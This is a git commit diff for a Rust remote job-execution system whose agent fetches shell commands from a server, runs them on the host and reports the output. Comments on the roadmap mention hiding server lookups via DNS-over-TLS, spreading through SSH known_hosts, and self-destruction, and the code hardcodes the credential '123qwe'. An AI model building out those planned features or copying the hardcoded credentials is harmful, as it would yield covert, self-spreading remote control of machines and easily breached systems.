Resolve "Hold a readonly ref on a cached job"

4-update-check
Administrator 4 years ago
parent 4b4be31e01
commit 1ce14d37a5
  1. 29
      bin/u_agent/src/main.rs
  2. 43
      bin/u_panel/src/main.rs
  3. 34
      bin/u_server/src/db.rs
  4. 20
      bin/u_server/src/handlers.rs
  5. 10
      bin/u_server/src/main.rs
  6. 38
      lib/u_lib/src/api.rs
  7. 10
      lib/u_lib/src/errors.rs
  8. 1
      lib/u_lib/src/lib.rs
  9. 6
      lib/u_lib/src/models/agent.rs
  10. 137
      lib/u_lib/src/models/jobs.rs
  11. 7
      lib/u_lib/src/models/schema.rs
  12. 4
      migrations/2020-10-24-111622_create_all/up.sql

@ -2,9 +2,7 @@
// поддержка питона
// резолв адреса управляющего сервера через DoT
// кроссплатформенность (реализовать интерфейс для винды и никсов)
// перезапуск через memfd_create
// проверка обнов
// проверка ssh ключей и распространение через known_hosts
// самоуничтожение
#[macro_use]
@ -15,8 +13,10 @@ use std::env;
use u_lib::{
api::ClientHandler,
models::{gather},
build_jobs,
UID
build_jobs_with_result,
UID,
JobResult,
JobCache
};
use tokio::{time::{Duration, sleep}};
@ -44,17 +44,22 @@ async fn main() {
retry_until_ok!(instance.init(&cli_info).await);
info!("Instanciated! Running main loop");
loop {
let jobs = retry_until_ok!(instance.get_agent_jobs(Some(&*UID)).await);
if jobs.len() > 0 {
let job_uids: Vec<String> = jobs.iter()
.map(|j| j.id.to_string()[..8].to_owned())
.collect();
info!("Fetched jobs: \n{}", job_uids.join("\n"));
let result = build_jobs(jobs)
let job_requests: Vec<JobResult> =
retry_until_ok!(instance.get_agent_jobs(Some(&*UID)).await);
if job_requests.len() > 0 {
for jr in job_requests.iter() {
if !JobCache::contains(&jr.job_id) {
info!("Fetching job: {}", &jr.job_id);
let fetched_job =
retry_until_ok!(instance.get_jobs(Some(&jr.job_id)).await).pop().unwrap();
JobCache::insert(fetched_job);
}
};
let result = build_jobs_with_result(job_requests)
.run_until_complete()
.await
.into_iter()
.map(|r| r.unwrap())//TODO: panic handler (send info on server)
.map(|r| r.unwrap())
.collect();
retry_until_ok!(instance.report(
&result

@ -1,7 +1,8 @@
use structopt::StructOpt;
use u_lib::{
api::ClientHandler,
models::JobMeta
models::JobMeta,
UError
};
use std::path::PathBuf;
use uuid::Uuid;
@ -51,10 +52,7 @@ enum JmALD {
},
List {
#[structopt(parse(try_from_str = parse_uuid))]
uid: Option<Uuid>,
#[structopt(short, long)]
results: bool
uid: Option<Uuid>
},
Delete {
#[structopt(parse(try_from_str = parse_uuid))]
@ -78,46 +76,47 @@ fn parse_uuid(src: &str) -> Result<Uuid, String> {
Uuid::parse_str(src).map_err(|e| e.to_string())
}
#[tokio::main]
async fn main() -> Result<(), &'static str> {
let args: Args = Args::from_args();
async fn process_cmd(cmd: Cmd) -> Result<(), UError> {
let cli_handler = ClientHandler::new(None)
.password("123qwe".to_string());
match args.cmd {
match cmd {
Cmd::Agents(action) => match action {
LD::List {uid} => cli_handler.get_agents(uid.as_ref())
.await.unwrap().into_iter().for_each(|r| println!("{}{}", DELIM, r)),
.await?.into_iter().for_each(|r| println!("{}{}", DELIM, r)),
LD::Delete {uid} => {
println!("{}", cli_handler.del(Some(&uid)).await.unwrap());
println!("{}", cli_handler.del(Some(&uid)).await?);
}
},
Cmd::Jobs(action) => match action {
JobALD::Add {cmd: JobCmd::Cmd(cmd), agent} => {
let job = JobMeta::from_shell(cmd.join(" "));
let job_uid = job.id;
cli_handler.upload_jobs(&vec![job]).await.unwrap();
cli_handler.upload_jobs(&vec![job]).await?;
if agent.is_some() {
cli_handler.set_jobs(&vec![job_uid], agent.as_ref()).await.unwrap()
cli_handler.set_jobs(&vec![job_uid], agent.as_ref()).await?
}
},
JobALD::LD(LD::List {uid}) => cli_handler.get_jobs(uid.as_ref())
.await.unwrap().into_iter().for_each(|r| println!("{}{}", DELIM, r)),
.await?.into_iter().for_each(|r| println!("{}{}", DELIM, r)),
JobALD::LD(LD::Delete {uid}) => {
println!("{}", cli_handler.del(Some(&uid)).await.unwrap())
println!("{}", cli_handler.del(Some(&uid)).await?)
}
}
Cmd::Jobmap(action) => match action {
JmALD::Add {agent_uid, job_uids} => cli_handler.set_jobs(&job_uids, Some(&agent_uid))
.await.unwrap(),
JmALD::List {uid, results} => if results {
cli_handler.get_results(uid.as_ref())
.await.unwrap().into_iter().for_each(|r| println!("{}{}", DELIM, r))
} else {
.await?,
JmALD::List {uid} => {
cli_handler.get_agent_jobs(uid.as_ref())
.await.unwrap().into_iter().for_each(|r| println!("{}{}", DELIM, r))
.await?.into_iter().for_each(|r| println!("{}{}", DELIM, r))
},
JmALD::Delete {uid} => println!("{}", cli_handler.del(Some(&uid)).await.unwrap())
JmALD::Delete {uid} => println!("{}", cli_handler.del(Some(&uid)).await?)
}
}
Ok(())
}
#[tokio::main]
async fn main() -> Result<(), UError> {
let args: Args = Args::from_args();
process_cmd(args.cmd).await
}

@ -67,37 +67,25 @@ impl UDB {
Ok(result)
}
//TODO: belongs_to
pub fn get_agent_jobs(&self, uid: Option<Uuid>, personal: bool) -> USrvResult<Vec<JobMeta>> {
use schema::{results, jobs};
pub fn get_agent_jobs(&self, uid: Option<Uuid>, personal: bool) -> USrvResult<Vec<JobResult>> {
use schema::results;
let mut q = results::table
.inner_join(jobs::table)
.into_boxed();
if uid.is_some() {
q = q.filter(results::agent_id.eq(uid.unwrap()))
}
if personal {
q = q.filter(results::state.eq(JobState::Queued))
}
let result = q.select(
(jobs::alias, jobs::id, jobs::exec_type, jobs::platform, jobs::payload)
)
.get_results::<JobMeta>(&self.conn)?;
Ok(result)
}
pub fn get_results(&self, uid: Option<Uuid>) -> USrvResult<Vec<JobResult>> {
use schema::results;
let result = if uid.is_some() {
results::table
.filter(results::agent_id.eq(uid.unwrap()))
q = q.filter(
results::state.eq(JobState::Queued)
.and(results::agent_id.eq(uid.unwrap()))
)
} else if uid.is_some() {
q = q.filter(results::agent_id.eq(uid.unwrap()))
.or_filter(results::job_id.eq(uid.unwrap()))
.or_filter(results::id.eq(uid.unwrap()))
.load::<JobResult>(&self.conn)?
} else {
results::table
.load::<JobResult>(&self.conn)?
};
}
let result = q.load::<JobResult>(&self.conn)?;
Ok(result)
}

@ -66,20 +66,6 @@ pub async fn get_jobs(
}
}
pub async fn get_results(
uid: Option<Uuid>,
db: Storage) -> Result<impl Reply, Rejection>
{
match db.lock()
.unwrap()
.get_results(uid) {
Ok(r) => Ok(warp::reply::json(
&r.as_message()
)),
Err(e) => Err(warp::reject())
}
}
pub async fn get_agent_jobs(
uid: Option<Uuid>,
db: Storage,
@ -135,7 +121,7 @@ pub async fn set_jobs(
.unwrap()
.set_jobs_for_agent(&agent_uid, &msg.into_inner()) {
Ok(_) => build_empty_200(),
Err(e) => build_response(StatusCode::BAD_REQUEST, dbg!(e))
Err(e) => build_response(StatusCode::BAD_REQUEST, e)
}
}
@ -160,7 +146,3 @@ pub async fn report(
}
build_empty_200()
}
pub async fn dummy() -> Result<impl Reply, Rejection> {
Ok(String::from("ok"))
}

@ -76,7 +76,7 @@ async fn main() {
let get_personal_jobs = warp::get()
.and(warp::path(Paths::get_agent_jobs))
.and(warp::path::param::<Uuid>().map(Some).or_else(infallible_none))
.and(warp::path::param::<Uuid>().map(Some))
.and(db.clone())
.and_then(|uid, db| handlers::get_agent_jobs(uid, db, true));
@ -99,15 +99,10 @@ async fn main() {
.and(db.clone())
.and_then(handlers::report);
let get_results = warp::get()
.and(warp::path(Paths::get_results))
.and(warp::path::param::<Uuid>().map(Some).or_else(infallible_none))
.and(db.clone())
.and_then(handlers::get_results);
let auth_token = warp::header::exact("authorization", "Bearer 123qwe");
let agent_zone = new_agent
.or(get_jobs.clone())
.or(get_personal_jobs)
.or(report)
;
@ -120,7 +115,6 @@ async fn main() {
.or(del)
.or(set_jobs)
.or(get_agent_jobs)
.or(get_results)
);
let routes = agent_zone

@ -11,7 +11,6 @@ use crate::{
use reqwest::{
Client,
Url,
Response,
RequestBuilder
};
use std::{
@ -95,14 +94,34 @@ macro_rules! build_handler {
let request = $crate::build_url_by_method!(
$method $path,
pname = $($param_name)?, ptype = $($param_type)?, urlparam = $($url_param)?
)(self $(, param as &$param_type)? $(, url_param as Option<&$url_param>)?);
)(
self
$(, param as &$param_type)?
$(, url_param as Option<&$url_param>)?
);
let response = request.send().await?;
match response.error_for_status() {
Ok(r) => Ok(r.json::<BaseMessage<$result>>()
let content_len = response.content_length();
let is_success = match response.error_for_status_ref() {
Ok(_) => Ok(()),
Err(e) => Err(UError::from(e))
};
match is_success {
Ok(_) => response.json::<BaseMessage<$result>>()
.await
.map(|msg| msg.into_inner())
.unwrap_or_default()),
Err(e) => Err(UError::from(e))
.or_else(|e| {
match content_len {
Some(0) => Ok(Default::default()),
_ => Err(UError::from(e))
}
}),
Err(UError::NetError(err_src, _)) => Err(
UError::NetError(
err_src,
response.text().await.unwrap()
)
),
_ => unreachable!()
}
}
}
@ -162,8 +181,8 @@ impl ClientHandler {
//////////////////
// client listing (A)
build_handler!(GET get_agents/Uuid() -> Vec<Agent>);
// get jobs for client (agent_id=Uuid)
build_handler!(GET get_agent_jobs/Uuid() -> Vec<JobMeta>);
// get jobs for client
build_handler!(GET get_agent_jobs/Uuid() -> Vec<JobResult>);
// get all available jobs (A)
build_handler!(GET get_jobs/Uuid() -> Vec<JobMeta>);
// add client to server's db
@ -175,8 +194,5 @@ build_handler!(GET del/Uuid() -> String);
// set jobs for client (A)
// POST /set_jobs/Uuid json: Vec<Uuid>
build_handler!(POST set_jobs/Uuid(Vec<Uuid>) -> ());
// get results (A)
// GET /get_job_results/Uuid
build_handler!(GET get_results/Uuid() -> Vec<JobResult>);
// report job result
build_handler!(POST report(Vec<JobResult>) -> ());

@ -13,8 +13,8 @@ pub enum UError {
#[error("Error: {0}")]
Raw(&'static str),
#[error("Connection error: {0}")]
NetError(String),
#[error("Connection error: {0}. Body: {1}")]
NetError(String, String),
#[error("Parse error")]
ParseError,
@ -28,8 +28,8 @@ pub enum UError {
#[error("Job cannot be ran on this platform. Expected: {0}, got: {1}")]
InsuitablePlatform(String, String),
#[error("Task {0} doesn't exist")]
NoTask(Uuid),
#[error("Job {0} doesn't exist")]
NoJob(Uuid),
#[error("Error opening {0}: {1}")]
FilesystemError(String, String)
@ -37,6 +37,6 @@ pub enum UError {
impl From<ReqError> for UError {
fn from(e: ReqError) -> Self {
UError::NetError(e.to_string())
UError::NetError(e.to_string(), String::new())
}
}

@ -21,5 +21,6 @@ extern crate lazy_static;
#[macro_use]
extern crate diesel;
#[macro_use]
extern crate log;
extern crate env_logger;

@ -88,10 +88,10 @@ pub async fn gather() -> IAgent {
id: UID.clone(),
hostname: run_cmd_fast("hostname").await,
is_root: &run_cmd_fast("id -u").await == "0",
is_root_allowed: false, //TODO
is_root_allowed: false,
platform: guess_host_triple().unwrap_or("Error").to_string(),
status: None, //TODO
token: None, //TODO
status: None, //wtf?
token: None,
username: run_cmd_fast("id -un").await,
}
}

@ -1,11 +1,15 @@
use std::{
time::{SystemTime, Duration},
thread,
sync::{RwLock, RwLockReadGuard},
cmp::PartialEq,
fmt,
string::ToString,
path::PathBuf,
fs
fs,
process::Output,
collections::HashMap,
ops::Deref,
};
use serde::{
Serialize,
@ -13,10 +17,13 @@ use serde::{
};
use uuid::Uuid;
use guess_host_triple::guess_host_triple;
use tokio::process::Command;
use tokio::{
process::Command
};
use crate::{
utils::systime_to_string,
models::schema::*,
Agent,
UError,
UResult,
UID,
@ -29,10 +36,49 @@ use diesel::{
Queryable,
Identifiable,
Insertable,
query_builder::AsChangeset
};
use strum::Display;
type Cache = HashMap<Uuid, JobMeta>;
lazy_static! {
static ref JOB_CACHE: RwLock<Cache> = RwLock::new(HashMap::new());
}
pub struct JobCache;
impl JobCache {
pub fn insert(job_meta: JobMeta) {
JOB_CACHE.write().unwrap().insert(job_meta.id, job_meta);
}
pub fn contains(uid: &Uuid) -> bool {
JOB_CACHE.read().unwrap().contains_key(uid)
}
pub fn get(uid: &Uuid) -> Option<JobCacheHolder> {
if !Self::contains(uid) {
return None
}
let lock = JOB_CACHE.read().unwrap();
Some(JobCacheHolder(lock, uid))
}
pub fn remove(uid: &Uuid) {
JOB_CACHE.write().unwrap().remove(uid);
}
}
pub struct JobCacheHolder<'jm>(pub RwLockReadGuard<'jm, Cache>, pub &'jm Uuid);
impl<'jm> Deref for JobCacheHolder<'jm> {
type Target = JobMeta;
fn deref(&self) -> &Self::Target {
self.0.get(self.1).unwrap()
}
}
#[derive(Serialize, Deserialize, Clone, Debug)]
pub enum ManageAction {
@ -46,7 +92,7 @@ pub enum ManageAction {
pub enum JobSchedule {
Once,
Permanent,
//TODO: Scheduled
//Scheduled
}
#[derive(Serialize, Deserialize, Clone, Debug, PartialEq, DbEnum, Display)]
@ -96,13 +142,13 @@ impl JobOutput {
}
}
pub fn stdout(mut self, data: &[u8]) -> Self {
self.stdout = data.to_owned();
pub fn stdout(mut self, data: Vec<u8>) -> Self {
self.stdout = data;
self
}
pub fn stderr(mut self, data: &[u8]) -> Self {
self.stderr = data.to_owned();
pub fn stderr(mut self, data: Vec<u8>) -> Self {
self.stderr = data;
self
}
@ -128,12 +174,12 @@ impl JobOutput {
raw.strip_prefix(&JobOutput::create_delim(JobOutput::STDOUT))
.map(|s: &str| {
let mut parts = s.split(&err_header)
.map(|d| d.trim().as_bytes())
.collect::<Vec<&[u8]>>()
.map(|d| d.trim().as_bytes().to_vec())
.collect::<Vec<Vec<u8>>>()
.into_iter();
JobOutput::new()
.stdout(parts.next().unwrap())
.stderr(parts.next().unwrap_or(&[]))
.stderr(parts.next().unwrap_or(vec![]))
})
}
@ -158,7 +204,7 @@ impl JobOutput {
Insertable
)]
#[table_name = "jobs"]
pub struct JobMeta { // TODO: shell cmd how to exec payload
pub struct JobMeta {
pub alias: String,
pub id: Uuid,
pub exec_type: JobType,
@ -223,7 +269,7 @@ impl Default for JobMeta {
Queryable,
Identifiable,
Insertable,
AsChangeset
AsChangeset,
)]
#[table_name = "results"]
pub struct JobResult {
@ -257,11 +303,13 @@ impl fmt::Display for JobResult {
}
impl JobResult {
pub fn from_meta(job_id: Uuid) -> Self {
let mut inst = JobResult::default();
inst.agent_id = *UID;
inst.job_id = job_id;
inst
pub fn from_meta(job_id: Uuid, result_id: Option<Uuid>) -> Self {
Self {
id: result_id.unwrap_or(Uuid::new_v4()),
agent_id: *UID,
job_id,
..Default::default()
}
}
//pub fn as_job_output(&self) -> JobOutput {}
@ -289,17 +337,20 @@ pub struct Job {
}
impl Job {
fn build(job_meta: JobMeta) -> UResult<Self> {
fn build(job_meta: &JobMeta, result_id: Uuid) -> UResult<Self> {
match job_meta.exec_type {
JobType::Shell => {
let curr_platform = guess_host_triple().unwrap_or("unknown").to_string();
if job_meta.platform != curr_platform {
return Err(UError::InsuitablePlatform(job_meta.platform, curr_platform))
return Err(UError::InsuitablePlatform(
job_meta.platform.clone(), curr_platform
))
}
let job_meta = job_meta.clone();
Ok(Self {
exec_type: job_meta.exec_type,
payload: job_meta.payload,
result: JobResult::from_meta(job_meta.id.clone())
result: JobResult::from_meta(job_meta.id.clone(), Some(result_id))
})
},
_ => todo!()
@ -315,7 +366,7 @@ impl Job {
}
None => unimplemented!()
};
let mut cmd_parts = str_payload // TODO: WRONG
let mut cmd_parts = str_payload
.split(" ")
.map(String::from)
.collect::<Vec<String>>()
@ -327,14 +378,14 @@ impl Job {
.output()
.await;
let (data, retcode) = match cmd_result {
Ok(output) => {
Ok(Output {status, stdout, stderr}) => {
(
Some(JobOutput::new()
.stdout(&output.stdout)
.stderr(&output.stderr)
.stdout(stdout)
.stderr(stderr)
.multiline()
),
output.status.code()
status.code()
)
}
Err(e) => {
@ -355,14 +406,38 @@ impl Job {
}
}
pub fn build_jobs<J: OneOrMany<JobMeta>>(job_metas: J) -> Waiter {
let prepared_jobs = job_metas.into_vec().into_iter().map(|job| -> DynFut {
let j = Job::build(job).unwrap();
Box::pin(j.run())
}).collect::<Vec<DynFut>>();
pub fn build_jobs_with_result<J: OneOrMany<JobResult>>(job_requests: J) -> Waiter {
let prepared_jobs = job_requests.into_vec()
.into_iter()
.filter_map(|jr| -> Option<DynFut> {
let job = {
let job_meta = JobCache::get(&jr.job_id);
if job_meta.is_none() {
Err(UError::NoJob(jr.job_id))
} else {
Job::build(&*job_meta.unwrap(), jr.id)
}
};
match job {
Ok(j) => Some(Box::pin(j.run())),
Err(e) => {
warn!("Job building error: {}", e);
None
}
}
}).collect::<Vec<DynFut>>();
Waiter::new(prepared_jobs)
}
pub fn build_jobs<J: OneOrMany<JobMeta>>(job_metas: J) -> Waiter {
let job_requests = job_metas.into_vec().into_iter().map(|jm| {
let j_uid = jm.id;
JobCache::insert(jm);
JobResult::from_meta(j_uid, None)
}).collect::<Vec<JobResult>>();
build_jobs_with_result(job_requests)
}
#[cfg(test)]
mod tests {

@ -49,9 +49,9 @@ table! {
use crate::*;
jobs (id) {
alias -> Nullable<Text>,
alias -> Text,
id -> Uuid,
exec_type -> JobType,
exec_type -> Jobtype,
platform -> Text,
payload -> Nullable<Bytea>,
}
@ -67,8 +67,9 @@ table! {
id -> Uuid,
job_id -> Uuid,
result -> Nullable<Bytea>,
state -> Jobstate,
retcode -> Nullable<Int4>,
ts -> Timestamp,
updated -> Timestamp,
}
}

@ -52,8 +52,8 @@ CREATE TABLE IF NOT EXISTS results (
, state JobState NOT NULL DEFAULT 'queued'
, retcode INTEGER
, updated TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP
, FOREIGN KEY(agent_id) REFERENCES agents(id)
, FOREIGN KEY(job_id) REFERENCES jobs(id)
, FOREIGN KEY(agent_id) REFERENCES agents(id) ON DELETE CASCADE
, FOREIGN KEY(job_id) REFERENCES jobs(id) ON DELETE CASCADE
, PRIMARY KEY(id)
);

Loading…
Cancel
Save